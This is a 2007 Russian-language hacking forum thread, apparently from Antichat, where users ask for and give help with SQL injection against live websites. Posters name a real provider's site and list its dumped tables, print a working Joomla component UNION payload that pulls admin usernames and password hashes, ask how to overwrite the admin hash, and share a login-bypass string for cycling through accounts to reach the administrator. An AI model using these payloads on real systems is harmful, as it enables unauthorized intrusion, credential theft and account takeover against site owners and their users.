 |
|
21.08.2007, 13:23
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
У меня вопрос по MSSQL
Есть сайт, на нём есть inj, стоит MSSQL. Мне нужно выбить имена таблиц, но на страницу ответы из запросов не выводятся... Тоесть я пишу UNION SELECT 1,2-- он выводит пустую страницу, тоесть всё ОК! В если напишу UNION SELECT 1,2,3
Выводит
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.
Тоесть он показывает ошибку!
Вопрос: Нельзя как-нибудь задать запрос, чтобы ответ вывелся как ошибка?
|
|
|
21.08.2007, 13:32
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Почитай статью КЕША.
http://forum.antichat.ru/showthread.php?t=30501
Там без юнион. Мне очень помогла статья, многие скули удалось провести.
|
|
|
|
21.08.2007, 13:40
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
Red_Red1, ЧУВАК! Огромное тебе спасибо и низкий поклон!
Извените за оффтоп, но не удержался!
|
|
|
|
23.08.2007, 13:02
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
С нами:
9982591
Репутация:
29
|
|
Короче есть такой сайтец : uralsmart.ru(провайдр кокойто)
на нем есть mssql injection:
http://uralsmart.ru/pages/?id=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHE MA.tables)--
провожу я - узнал все таблы:
'aSellers','aResponsiblePersons',
'eAuth_Groups',%20'eAuth_Groups_Members',
%20'eNotify_Log','ePage_Trans','eRoles',%20
'eRoles_Functions','syssegments','eRoles_Objects
','sysconstraints','aBlanks','aTariffs_Ethernet','
aTariffs_ADSL','aVacancy',%20'aTariffs_IPtel_Trunk ',
%20'aSharpdesignPortfolio','aTariffs_IPtel_World',
'xSearch_Pages','xSearch_Triads','xSearch_Words',
%20'eAuth','ePage','aTariffs_Dialup','vmNews','
dtproperties',%20'aHotLinks','zForms_Fields','
aSellers_Groups',%20'zForms_Forms','MainMenu','
votes','votes_answers','aHotImgs','mNews',%20
'Results','vAuth','vAuth_Active_NT','
vAuth_Active_Post','mWishBook_Groups',
'vAuth_Active_Cookies'%20,%20'mWishBook_Messages',
'aConnectZones','aSellers_Districts','mNews_Mailli st'
то что я нашел...(колумны я не стал писать) - но вот есть трабл:
Вот к примеру таблица eAuth в ней есть несколько колумнов : Name,Login,Pwd...
Вот проблема: колумн name я вывожу - се окей а вот
дело доходит до колумна pwd - пытаюсь вывести а меня mssql либо лесом посылает - ругается ... либо кидает на идекс сайта.........Как вывести Pwd?
Там еще много таблиц с колумноми pwd и все они выбрасыват....Help
Последний раз редактировалось x.Elf; 23.08.2007 в 13:05..
|
|
|
|
23.08.2007, 21:45
|
|
Познающий
Регистрация: 31.07.2006
Сообщений: 46
С нами:
10409701
Репутация:
18
|
|
есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
|
|
|
|
24.08.2007, 19:22
|
|
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
С нами:
9851426
Репутация:
1676
|
|
На сайте под управлением joomla есть уязвимость
http://site.com/index.php?option=com_rwcards&task=listCards&catego ry_id=-1'union%20select%201,2,03,4,concat(char(117,115,10 1,114,110,97,109,101,58),username,char(112,97,115, 115,119,111,114,100,58),password),50,044,076,0678, 07%20from%20jos_users/*
Хэш пароля админа ломаться не хочет, как бы мне проапдейтить хэш админа или добавить своего суперюзера?
Пробовал INSERT INTO и UPDATE, но "то ли лыжи не едут, то ли я е%$#*тый"
|
|
|
|
24.08.2007, 20:19
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
На Insert Into скорее всего нет прав, а Update не прокатит ибо после юноина тока селект мона и подзапросы все тоже с селектом только
__________________
|
|
|
|
24.08.2007, 20:54
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от cheb
есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
Хех... попробуй
Код:
' or 'a'='a' LIMIT 0,1 /*
затем
Код:
' or 'a'='a' LIMIT 1,1 /*
пока не найдещь того юзера который тебе нужен...
__________________
Кто я?..
|
|
|
|
25.08.2007, 08:28
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос
1+or+1=(SELECT+TOP+1+Login+from+admin)--
он успешно выполняется, я вижу логин, затем пишу
1+or+1=(SELECT+TOP+1+PassHash+from+admin)--
и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся
Помогите, плиз!
|
|
|
|
25.08.2007, 09:51
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
С нами:
9982591
Репутация:
29
|
|
Сообщение от Ded MustD!e
Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос
1+or+1=(SELECT+TOP+1+Login+from+admin)--
он успешно выполняется, я вижу логин, затем пишу
1+or+1=(SELECT+TOP+1+PassHash+from+admin)--
и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся
Помогите, плиз!
Аналогичная ситуация (uralsmart.ru) тока кого спрашиал - никто не помог...Там конф видать не дает вывод делать...
Так что все...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
